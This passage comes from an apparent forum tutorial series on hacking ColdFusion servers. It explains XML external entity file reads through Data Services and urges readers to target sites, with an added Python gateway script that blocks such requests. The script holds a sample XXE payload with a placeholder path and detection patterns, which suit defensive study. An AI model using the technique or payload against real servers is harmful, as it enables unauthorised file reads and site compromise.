    Simply replace '<INSERT_PATH/FILE_HERE>' with the path to read and let the requests rip, like so:





    Now the cool thing here is that it works regardless of OS, since it is due to how the Data Services are handling and parsing the XML data being passed, just make sure you request the proper file type for designated system type (check server response if you have no idea)...





    Also in addition to reading files, you can simply pass a directory and it will spit back the directory content, making it very easy to map things out and find files worth reading. Now limited privileges may restrict some file reading but still plenty enough to cause trouble, enumerate lots of info, and possibly even read the site configuration details...
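The whole attack above rests on one thing: the Data Services endpoint accepts a request body that declares an external entity and then resolves it. The script below is an added example (not from the original post) of the two-layer defence a gateway in front of such an endpoint would apply: a cheap textual pre-check that rejects any body carrying a DOCTYPE, since an AMFX message never needs one, and an expat parser configured to refuse every external entity should one slip through. The sample requests are constructed from the post's AMFX envelope, with a placeholder file path instead of a real target.

```python
"""Reject XML requests that carry a DTD or external entity before parsing.

Added example, not from the original post. The sample requests are
constructed; the entity in MALICIOUS_REQUEST points at a placeholder path.
"""
import re
import xml.parsers.expat as expat

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.I)
EXTERNAL_ENTITY_RE = re.compile(r"<!ENTITY\s+%?\s*\S+\s+(?:SYSTEM|PUBLIC)\b", re.I)

BENIGN_REQUEST = (
    '<?xml version="1.0" encoding="utf-8"?>'
    '<amfx ver="3" xmlns="http://www.macromedia.com/2005/amfx"><body>'
    '<object type="flex.messaging.messages.CommandMessage">'
    '<traits><string>operation</string></traits><int>5</int>'
    '</object></body></amfx>'
)

# Same envelope with an external entity declared and then referenced in the body.
MALICIOUS_REQUEST = (
    '<?xml version="1.0" encoding="utf-8"?>'
    '<!DOCTYPE test [ <!ENTITY x3 SYSTEM "file:///PLACEHOLDER/secret.txt"> ]>'
    '<amfx ver="3" xmlns="http://www.macromedia.com/2005/amfx"><body>'
    '<string>&x3;</string></body></amfx>'
)


def classify_xml_request(body):
    """Return "external_entity", "dtd" or "ok" from a textual pre-check.

    Any DOCTYPE is refused, which also stops the internal-entity blow-up
    (denial of service) variants the post mentions, not only file reads.
    """
    if EXTERNAL_ENTITY_RE.search(body):
        return "external_entity"
    if DOCTYPE_RE.search(body):
        return "dtd"
    return "ok"


def parse_refusing_external_entities(body):
    """Parse with expat while refusing every external entity.

    Returns (True, element_names) on success, or (False, reason) when the
    document is malformed or tried to pull in an external entity.
    """
    names, refused = [], []
    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def refuse(context, base, system_id, public_id):
        refused.append(system_id)
        return 0  # a zero return makes expat abort instead of fetching the entity

    parser.ExternalEntityRefHandler = refuse
    parser.StartElementHandler = lambda name, attrs: names.append(name)
    try:
        parser.Parse(body, True)
    except expat.ExpatError as exc:
        if refused:
            return False, f"refused external entity {refused[0]}"
        return False, f"malformed XML: {exc}"
    return True, names


def handle_request(body):
    """Gateway policy: reject on the pre-check, then parse with the hardened parser."""
    verdict = classify_xml_request(body)
    if verdict != "ok":
        return False, f"rejected: request body contains a {verdict}"
    return parse_refusing_external_entities(body)


if __name__ == "__main__":
    for label, body in (("benign", BENIGN_REQUEST), ("malicious", MALICIOUS_REQUEST)):
        ok, detail = handle_request(body)
        print(f"{label}: {'accepted' if ok else 'blocked'} -> {detail}")
```

The textual pre-check is deliberately crude: it is there so the decision is made before any parser touches the body. The parser-level refusal is the layer that still holds when the request arrives through a path the pre-check does not cover, and the recorded system identifier is the value worth logging when a request is blocked.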




    In addition to the named exploits in this Cold Fusion series, the same old usual suspects are still fair game here. SQL injection vulnerabilities are just as common as on PHP or ASP based sites, and 'cfincludes' can enable source disclosures. In many cases the db can be compromised and Java commands may be leveraged to further extend the potential attack vectors and escalation platform from that of a standard injection, so keep your eyes out and don't be afraid to take on a new site just because it has .CFM or .JSP files instead of the oh so popular .PHP or .ASP. Hope you enjoyed this short series on hacking Cold Fusion Servers. All material for the series was available on the net in various places, all I did was wrap it up for you and try to make it a little easier to understand. If you have any questions or suggestions please post them here or let me know via PM.